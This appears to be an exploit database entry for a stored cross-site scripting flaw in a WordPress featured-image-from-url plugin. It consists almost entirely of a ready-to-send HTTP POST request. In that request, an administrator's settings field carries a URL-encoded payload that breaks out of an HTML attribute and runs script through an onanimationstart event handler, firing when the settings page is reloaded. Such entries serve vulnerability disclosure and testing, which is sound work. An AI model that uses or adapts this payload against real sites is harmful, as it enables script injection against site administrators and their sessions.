Share
## https://sploitus.com/exploit?id=WPEX-ID:4481731D-4DBF-4BFA-B4CC-64F10BB7E7BF
POST /wp-admin/admin.php?page=featured-image-from-url HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 137
Connection: close
Cookie: [admin+]

nonce_fifu_form_photon=97e59a4740&fifu_input_photon=on%22%20style%3danimation-name%3arotation%20onanimationstart%3dalert(%2fXSS%2f)%2f%2f

The XSS will be triggered when accessing the settings again